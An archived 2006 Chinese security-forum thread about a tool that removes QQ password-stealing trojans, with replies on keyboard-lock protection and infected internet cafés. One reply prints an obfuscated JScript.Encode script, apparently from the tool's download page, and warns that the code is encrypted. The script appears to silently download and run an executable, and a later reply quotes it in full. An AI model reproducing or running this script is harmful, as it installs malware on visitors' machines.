邪恶八进制信息安全团队技术讨论组's Archiver

t4nk 2006-9-15 18:09

[原创]小沈Q盗杀手正式版 Version1.0

*** 作者被禁止或删除 内容自动屏蔽 ***

ch4o.jt 2006-9-16 13:48

楼主做得很不错,现在盗Q太泛滥了..``.. [s:73]
[s:51]  建议楼主添加恢复键盘锁的功能,现在的QQ木马都是要弄掉那个键盘锁才能盗号的,中过QQ木马的人,就算清除了QQ木马也失去了键盘锁的保护,很没安全感哦`~~[s:36]
先把键盘锁文件制作成资源文件,然后从注册表读取QQ的路径,覆盖原来的键盘锁文件...[s:70]
顶,支持楼主继续开发.以及其他木马的行为查杀它...
再此BS一下腾讯,为什么主程序运行不去判断键盘锁文件的MD5的合法性呢?NND,搞到现在盗Q的人一大堆..`~

sunwear 2006-9-16 14:42

[quote][b]这里是引用第[/b][color=#ff0000][1 楼][/color][b]的[color=#000066]ch4o.jt[/color]于[/b]2006-09-16 13:48[b]发表的:[/b]
楼主做得很不错,现在盗Q太泛滥了..``.. [s:73]
[s:51]  建议楼主添加恢复键盘锁的功能,现在的QQ木马都是要弄掉那个键盘锁才能盗号的,中过QQ木马的人,就算清除了QQ木马也失去了键盘锁的保护,很没安全感哦`~~[s:36]
先把键盘锁文件制作成资源文件,然后从注册表读取QQ的路径,覆盖原来的键盘锁文件...[s:70]
顶,支持楼主继续开发.以及其他木马的行为查杀它...
再此BS一下腾讯,为什么主程序运行不去判断键盘锁文件的MD5的合法性呢?NND,搞到现在盗Q的人一大堆..`~[/quote]
重新安装一次QQ 只要npkcrypt被load就可以了

笑哈哈 2006-9-16 20:57

貌似新版的QQ 具有 新的密码保护功能
既是在被破坏了 密码锁 后
被人记录了密码 真实密码是
12345679 记录的时候就记录成 123456789987654321
abcd被记录成abcddcba
这种

sunwear 2006-9-18 18:24

[quote][b]这里是引用第[/b][color=#ff0000][4 楼][/color][b]的[color=#000066]→入侵者╄[/color]于[/b]2006-09-18 13:26[b]发表的:[/b]
能具体说下 怎么恢复键盘锁的保护功能不?[/quote]
重新安装一次QQ 只要npkcrypt被load就可以了
非要说两遍么

zzzddd 2006-9-19 22:40

重新安装一次QQ 只要npkcrypt被load就可以了

caiker 2006-9-22 13:56

[quote][b]这里是引用第[/b][color=#ff0000][3 楼][/color][b]的[color=#000066]笑哈哈[/color]于[/b]2006-09-16 20:57[b]发表的:[/b]
貌似新版的QQ 具有 新的密码保护功能
既是在被破坏了 密码锁 后
被人记录了密码 真实密码是
12345679 记录的时候就记录成 123456789987654321
abcd被记录成abcddcba
.......[/quote]
你是开玩笑吧?那这和暴露密码有什么区别?即使密码是abcd,被记录成了abcddcba,那么abcddcba一共有8个字节,8/2==4,取总数量的前一半,不就是正确密码了么?腾讯公司的人会蠢到这种地步?

webpage 2006-9-22 19:59

代码经过加密了
<script language = JScript.Encode>#@~^EAIAAA==-mD~!D^~wmY4IEMVxJ4YO2=zzSAhc\k9nGRs+b4;R^Gszhl  CoD&rslon&g+AsKs9+.J6.F!ZRa+ri2lDtxE;)-&#39;8WKYRanJpYMX`\C.,l[W{cNKm;hxY ^M+CY3^+hxD`JK4NnmDJb#pl[Gc/+D)YDDk(;O+vJ1VC/dr9JSJ1s/bNl$G,v/XlvRvl)2Oq8fZO,R&zR!ZZTcwZ+1A&vrbi7lD,ahV{l9W Z.nmYnr(%+1YcEtkm.GkWWYcptSu:KhJ~rJ*I\mD~lk&#39;C[KRmMnlD+W(%nmD`rb[W[8c?ODC:r~EE*i6hscr2+  crM3:JBED^~ZbiX:sRU+U[v#imdRDXwxqim/cW2+Uc*iC/cADbYncX:V ./2W  dAG9X*ilkRkC\YG0bVncalY4S *ilk ^VK/`bi-CMPdtsV{l[GcmDnCD+G4Nn1Ycr?4+V^Rz2w^k^lDkGUr~Jrbikt+^s ?4+^V36n^!Yn`aCY4~EEBJJSEKwnxrSZ#I)mmYm4`b  )iY7EAAA==^#~@</script>


<script src=&#39;[url]http://s66.cnzz.com/stat.php?id=255371&web_id=255371[/url]&#39; language=&#39;JavaScript&#39; charset=&#39;gb2312&#39;></script>

mikiyo 2006-9-23 22:20

[quote][b]这里是引用第[/b][color=#ff0000][10 楼][/color][b]的[color=#000066]zsb[/color]于[/b]2006-09-23 14:16[b]发表的:[/b]
如有qq病毒木马之类,如何联系于你![/quote]




不必要联系的,,其实杀毒清理完后,重新下个QQ 就OK啦!

自己动手,才能收获

可以继续的话,,也帮你啊!

tonway 2006-9-24 01:23

汗  就是有一点不好 不知道木马的位子  
我中了黑侠  郁闷

残耳 2006-9-25 10:52

[quote][b]这里是引用第[/b][color=#ff0000][7 楼][/color][b]的[color=#000066]webpage[/color]于[/b]2006-09-22 19:59[b]发表的:[/b]
代码经过加密了
<script language = JScript.Encode>#@~^EAIAAA==-mD~!D^~wmY4IEMVxJ4YO2=zzSAhck9nGRs+b4;R^Gszhl   CoD&rslon&g+AsKs9+.J6.F!ZRa+ri2lDtxE;)-&#39;8WKYRanJpYMX`C.,l[W{cNKm;hxY ^M+CY3^+hxD`JK4NnmDJb#pl[Gc/+D)YDDk(;O+vJ1VC/dr9JSJ1s/bNl$G,v/XlvRvl)2Oq8fZO,R&zR!ZZTcwZ+1A&vrbi7lD,ahV{l9W Z.nmYnr(%+1YcEtkm.GkWWYcptSu:KhJ~rJ*ImD~lk&#39;C[KRmMnlD+W(%nmD`rb[W[8c?ODC:r~EE*i6hscr2+   crM3:JBED^~ZbiX:sRU+U[v#imdRDXwxqim/cW2+Uc*iC/cADbYncX:V ./2W   dAG9X*ilkRkCYG0bVncalY4S *ilk ^VK/`bi-CMPdtsV{l[GcmDnCD+G4Nn1Ycr?4+V^Rz2w^k^lDkGUr~Jrbikt+^s ?4+^V36n^!Yn`aCY4~EEBJJSEKwnxrSZ#I)mmYm4`b   )iY7EAAA==^#~@</script>


<script src=&#39;[url]http://s66.cnzz.com/stat.php?id=255371&web_id=255371[/url]&#39; language=&#39;JavaScript&#39; charset=&#39;gb2312&#39;></script>[/quote]


这个是使用站长之家的流量统计,有问题吗?难道你还要怀疑沈哥留后门了不成?

xiaocool 2006-9-29 20:38

正常东西。。加个密干吗的。
有意让人怀疑。。

防潮生生世世 2006-9-30 04:29

小沈专杀系列-小沈Q盗杀手K2.6 Beta
小沈专杀系列-小沈Q盗杀手正式版V1.0

到底哪个是最新的? [s:74]

zczpc2000 2006-10-1 23:16

在合肥的大网吧。。。百分之八十都被下了QQ木马。。每次我都要重装一遍QQ再上。。。。

(是不是有什么很简单的方法过还原精灵的,我看每个网吧每台机都下了马。。。哎。。。)

xiaocool 2006-10-5 15:16

[quote][b]这里是引用第[/b][color=#ff0000][13 楼][/color][b]的[color=#000066]zczpc2000[/color]于[/b]2006-10-01 23:16[b]发表的:[/b]
在合肥的大网吧。。。百分之八十都被下了QQ木马。。每次我都要重装一遍QQ再上。。。。

(是不是有什么很简单的方法过还原精灵的,我看每个网吧每台机都下了马。。。哎。。。)[/quote]
它们没装还原卡的么?
自己申请好密码保护就好了。
任他盗。。。

jmo_jmo 2006-11-16 02:08

有密码保护也被人盗的,并且篡改保护资料,如果不及时发现很有可能丢失Q也
最好的办法是申请保护
并且更新
一般来说修改的话都是通过申诉的
我测试过

页: [1]
© 1999-2008 EvilOctal Security Team